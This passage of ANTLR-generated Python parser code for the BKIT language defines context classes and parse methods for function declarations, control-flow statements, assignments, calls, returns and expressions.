super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def params_list(self):\n return self.getTypedRuleContext(BKITParser.Params_listContext,0)\n\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterFunction_declare\" ):\n listener.enterFunction_declare(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitFunction_declare\" ):\n listener.exitFunction_declare(self)\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 96\n self.match(BKITParser.FUNCTION)\n self.state = 97\n self.match(BKITParser.COLON)\n self.state = 98\n self.match(BKITParser.ID)\n self.state = 102\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.PARAMETER:\n self.state = 99\n self.match(BKITParser.PARAMETER)\n self.state = 100\n self.match(BKITParser.COLON)\n self.state = 101\n self.params_list()\n\n\n self.state = 104\n self.match(BKITParser.BODY)\n self.state = 105\n self.match(BKITParser.COLON)\n self.state = 111\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 106\n self.var_declare_stmt()\n self.state = 107\n self.match(BKITParser.SEMI)\n self.state = 113\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 117\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.BREAK) | (1 << BKITParser.CONTINUE) | (1 << BKITParser.DO) | (1 << BKITParser.FOR) | (1 << BKITParser.IF) | (1 << BKITParser.RETURN) | (1 << BKITParser.WHILE) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 114\n self.stmt()\n self.state = 119\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 120\n self.match(BKITParser.ENDBODY)\n self.state = 121\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Stmt_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt_list\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterStmt_list\" ):\n listener.enterStmt_list(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitStmt_list\" ):\n listener.exitStmt_list(self)\n\n\n\n\n def stmt_list(self):\n\n localctx = BKITParser.Stmt_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_stmt_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 128\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 123\n self.var_declare_stmt()\n self.state = 124\n self.match(BKITParser.SEMI)\n self.state = 130\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 134\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,6,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 131\n self.stmt() \n self.state = 136\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,6,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def if_stmt(self):\n return self.getTypedRuleContext(BKITParser.If_stmtContext,0)\n\n\n def for_stmt(self):\n return self.getTypedRuleContext(BKITParser.For_stmtContext,0)\n\n\n def while_stmt(self):\n return self.getTypedRuleContext(BKITParser.While_stmtContext,0)\n\n\n def dowhile_stmt(self):\n return self.getTypedRuleContext(BKITParser.Dowhile_stmtContext,0)\n\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def break_stmt(self):\n return self.getTypedRuleContext(BKITParser.Break_stmtContext,0)\n\n\n def continue_stmt(self):\n return self.getTypedRuleContext(BKITParser.Continue_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def return_stmt(self):\n return self.getTypedRuleContext(BKITParser.Return_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterStmt\" ):\n listener.enterStmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitStmt\" ):\n listener.exitStmt(self)\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_stmt)\n try:\n self.state = 156\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,7,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 137\n self.if_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 138\n self.for_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 139\n self.while_stmt()\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 140\n self.dowhile_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state = 141\n self.assign_stmt()\n self.state = 142\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 6:\n self.enterOuterAlt(localctx, 6)\n self.state = 144\n self.break_stmt()\n self.state = 145\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 7:\n self.enterOuterAlt(localctx, 7)\n self.state = 147\n self.continue_stmt()\n self.state = 148\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 8:\n self.enterOuterAlt(localctx, 8)\n self.state = 150\n self.call_stmt()\n self.state = 151\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 9:\n self.enterOuterAlt(localctx, 9)\n self.state = 153\n self.return_stmt()\n self.state = 154\n self.match(BKITParser.SEMI)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def IF(self):\n return self.getToken(BKITParser.IF, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def THEN(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.THEN)\n else:\n return self.getToken(BKITParser.THEN, i)\n\n def stmt_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Stmt_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,i)\n\n\n def ENDIF(self):\n return self.getToken(BKITParser.ENDIF, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def ELSEIF(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ELSEIF)\n else:\n return self.getToken(BKITParser.ELSEIF, i)\n\n def ELSE(self):\n return self.getToken(BKITParser.ELSE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterIf_stmt\" ):\n listener.enterIf_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitIf_stmt\" ):\n listener.exitIf_stmt(self)\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_if_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 158\n self.match(BKITParser.IF)\n self.state = 159\n self.expr()\n self.state = 160\n self.match(BKITParser.THEN)\n self.state = 161\n self.stmt_list()\n self.state = 169\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ELSEIF:\n self.state = 162\n self.match(BKITParser.ELSEIF)\n self.state = 163\n self.expr()\n self.state = 164\n self.match(BKITParser.THEN)\n self.state = 165\n self.stmt_list()\n self.state = 171\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 174\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.ELSE:\n self.state = 172\n self.match(BKITParser.ELSE)\n self.state = 173\n self.stmt_list()\n\n\n self.state = 176\n self.match(BKITParser.ENDIF)\n self.state = 177\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declare_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self):\n return self.getTypedRuleContext(BKITParser.Var_declareContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterVar_declare_stmt\" ):\n listener.enterVar_declare_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitVar_declare_stmt\" ):\n listener.exitVar_declare_stmt(self)\n\n\n\n\n def var_declare_stmt(self):\n\n localctx = BKITParser.Var_declare_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_var_declare_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 179\n self.var_declare()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class For_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FOR(self):\n return self.getToken(BKITParser.FOR, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDFOR(self):\n return self.getToken(BKITParser.ENDFOR, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_for_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterFor_stmt\" ):\n listener.enterFor_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitFor_stmt\" ):\n listener.exitFor_stmt(self)\n\n\n\n\n def for_stmt(self):\n\n localctx = BKITParser.For_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_for_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 181\n self.match(BKITParser.FOR)\n self.state = 182\n self.match(BKITParser.LEFT_PAREN)\n self.state = 183\n self.match(BKITParser.ID)\n self.state = 184\n self.match(BKITParser.ASSIGN)\n self.state = 185\n self.expr()\n self.state = 186\n self.match(BKITParser.COMMA)\n self.state = 187\n self.expr()\n self.state = 188\n self.match(BKITParser.COMMA)\n self.state = 189\n self.expr()\n self.state = 190\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 191\n self.match(BKITParser.DO)\n self.state = 192\n self.stmt_list()\n self.state = 193\n self.match(BKITParser.ENDFOR)\n self.state = 194\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDWHILE(self):\n return self.getToken(BKITParser.ENDWHILE, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterWhile_stmt\" ):\n listener.enterWhile_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitWhile_stmt\" ):\n listener.exitWhile_stmt(self)\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 196\n self.match(BKITParser.WHILE)\n self.state = 197\n self.expr()\n self.state = 198\n self.match(BKITParser.DO)\n self.state = 199\n self.stmt_list()\n self.state = 200\n self.match(BKITParser.ENDWHILE)\n self.state = 201\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def ENDDO(self):\n return self.getToken(BKITParser.ENDDO, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterDowhile_stmt\" ):\n listener.enterDowhile_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitDowhile_stmt\" ):\n listener.exitDowhile_stmt(self)\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 203\n self.match(BKITParser.DO)\n self.state = 204\n self.stmt_list()\n self.state = 205\n self.match(BKITParser.WHILE)\n self.state = 206\n self.expr()\n self.state = 207\n self.match(BKITParser.ENDDO)\n self.state = 208\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def array_cell(self):\n return self.getTypedRuleContext(BKITParser.Array_cellContext,0)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterAssign_stmt\" ):\n listener.enterAssign_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitAssign_stmt\" ):\n listener.exitAssign_stmt(self)\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 212\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.state = 210\n self.array_cell()\n pass\n\n elif la_ == 2:\n self.state = 211\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 214\n self.match(BKITParser.ASSIGN)\n self.state = 215\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Break_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def BREAK(self):\n return self.getToken(BKITParser.BREAK, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_break_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterBreak_stmt\" ):\n listener.enterBreak_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitBreak_stmt\" ):\n listener.exitBreak_stmt(self)\n\n\n\n\n def break_stmt(self):\n\n localctx = BKITParser.Break_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_break_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 217\n self.match(BKITParser.BREAK)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Continue_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def CONTINUE(self):\n return self.getToken(BKITParser.CONTINUE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_continue_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterContinue_stmt\" ):\n listener.enterContinue_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitContinue_stmt\" ):\n listener.exitContinue_stmt(self)\n\n\n\n\n def continue_stmt(self):\n\n localctx = BKITParser.Continue_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_continue_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 219\n self.match(BKITParser.CONTINUE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterCall_stmt\" ):\n listener.enterCall_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitCall_stmt\" ):\n listener.exitCall_stmt(self)\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_call_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 221\n self.match(BKITParser.ID)\n self.state = 222\n self.match(BKITParser.LEFT_PAREN)\n self.state = 233\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.UN_LOGICAL_OP) | (1 << BKITParser.UN_OP) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 223\n self.expr()\n self.state = 228\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 224\n self.match(BKITParser.COMMA)\n self.state = 225\n self.expr()\n self.state = 230\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 235\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 236\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Return_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_return_stmt\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterReturn_stmt\" ):\n listener.enterReturn_stmt(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitReturn_stmt\" ):\n listener.exitReturn_stmt(self)\n\n\n\n\n def return_stmt(self):\n\n localctx = BKITParser.Return_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_return_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 238\n self.match(BKITParser.RETURN)\n self.state = 240\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.UN_LOGICAL_OP) | (1 << BKITParser.UN_OP) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 239\n self.expr()\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def REL_OP(self):\n return self.getToken(BKITParser.REL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr\" ):\n listener.enterExpr(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr\" ):\n listener.exitExpr(self)\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_expr)\n try:\n self.state = 247\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,14,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 242\n self.expr1(0)\n self.state = 243\n self.match(BKITParser.REL_OP)\n self.state = 244\n self.expr1(0)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 246\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def BIN_LOGICAL_OP(self):\n return self.getToken(BKITParser.BIN_LOGICAL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr1\" ):\n listener.enterExpr1(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr1\" ):\n listener.exitExpr1(self)\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 32\n self.enterRecursionRule(localctx, 32, self.RULE_expr1, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 250\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 257\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,15,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 252\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 253\n self.match(BKITParser.BIN_LOGICAL_OP)\n self.state = 254\n self.expr2(0) \n self.state = 259\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,15,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def ADD_OP(self):\n return self.getToken(BKITParser.ADD_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr2\" ):\n listener.enterExpr2(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr2\" ):\n listener.exitExpr2(self)\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n 